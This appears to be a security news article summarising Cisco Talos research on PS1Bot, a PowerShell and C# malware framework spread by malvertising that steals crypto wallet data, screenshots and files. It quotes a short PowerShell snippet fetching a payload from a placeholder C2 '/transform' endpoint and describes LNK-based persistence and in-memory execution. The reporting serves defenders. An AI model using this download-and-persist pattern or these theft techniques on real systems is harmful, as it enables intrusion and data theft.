A sophisticated new malware campaign targeting Windows systems has emerged, employing a multi-stage framework dubbed “PS1Bot” that combines PowerShell and C# components to conduct extensive information theft operations.
The malware represents a significant evolution in attack methodologies, utilizing modular architecture and in-memory execution techniques to evade traditional detection mechanisms while maintaining persistent access to compromised systems.
PS1Bot operates through malvertising campaigns that deliver compressed archives with filenames designed to match search engine optimization patterns, such as “chapter 8 medicare benefit policy manual.zip” and “Counting Canadian Money Worksheets Pdf.zip.e49”.
These seemingly legitimate files contain a JavaScript downloader named “FULL DOCUMENT.js” that initiates the infection chain by retrieving additional malicious components from attacker-controlled servers.
The malware’s modular design enables threat actors to deploy various specialized components on-demand, including information stealers, keyloggers, screen capture tools, and persistence mechanisms.
Cisco Talos analysts noted that PS1Bot has been extremely active throughout 2025, with new samples being observed continuously, indicating ongoing development and refinement of the framework.
Deobfuscating the downloader script (Source – Cisco Talos)
What distinguishes PS1Bot from conventional malware is its emphasis on stealth through minimal disk footprint and extensive use of in-memory execution.
The framework leverages PowerShell’s Invoke-Expression (IEX) functionality to dynamically execute modules without writing them to disk, significantly reducing the likelihood of detection by traditional antivirus solutions.
Sophisticated Persistence and Evasion Mechanisms
PS1Bot implements a particularly clever persistence strategy that creates randomly-named PowerShell scripts within the %PROGRAMDATA% directory alongside corresponding shortcut files.
The malware generates a malicious LNK file in the Windows Startup directory that points to these PowerShell scripts, ensuring reactivation after system reboots.
The persistence module retrieves obfuscated payloads from the command and control server’s “/transform” endpoint, as demonstrated in the following code structure:-
$url = “http://[C2_SERVER]/transform”
$content = (New-Object Net.WebClient).DownloadString($url)
# Content is then deobfuscated and written to randomly-named PS1 file
This payload contains the same C2 polling logic used in the initial infection, creating a self-perpetuating cycle.
The malware constructs unique communication URLs using the infected system’s C: drive serial number, enabling individualized tracking of compromised machines while maintaining operational security.
The framework’s information theft capabilities are particularly concerning, targeting cryptocurrency wallets through embedded wordlists containing seed phrase combinations in multiple languages.
Example HTTP POST containing Base64 encoded screenshot image file (Source – Cisco Talos)
PS1Bot scans the file system for documents containing wallet recovery phrases and password files, compressing and exfiltrating this sensitive data via HTTP POST requests to attacker infrastructure.
Cisco Talos researchers identified significant code similarities between PS1Bot and previously reported malware families, including AHK Bot and components associated with Skitnet campaigns, suggesting potential shared development resources or threat actor collaboration across these operations.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source: cybersecuritynews.com
